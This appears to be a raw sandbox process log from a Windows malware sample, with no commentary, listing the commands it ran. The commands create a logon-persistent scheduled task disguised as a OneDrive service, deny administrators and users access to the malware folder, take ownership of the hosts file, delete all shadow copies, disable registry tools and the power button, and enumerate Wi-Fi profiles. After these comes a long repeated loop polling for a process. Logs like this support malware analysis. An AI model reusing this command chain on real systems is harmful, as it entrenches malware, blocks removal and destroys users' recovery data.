
C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"

C:\Windows\system32\icacls.exe

icacls "C:\Users" /grant Admin:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\SYSTEM32\setx.exe

setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI39922\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI23842\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %USERNAME%"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"

C:\Windows\system32\netsh.exe

netsh wlan show interfaces

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

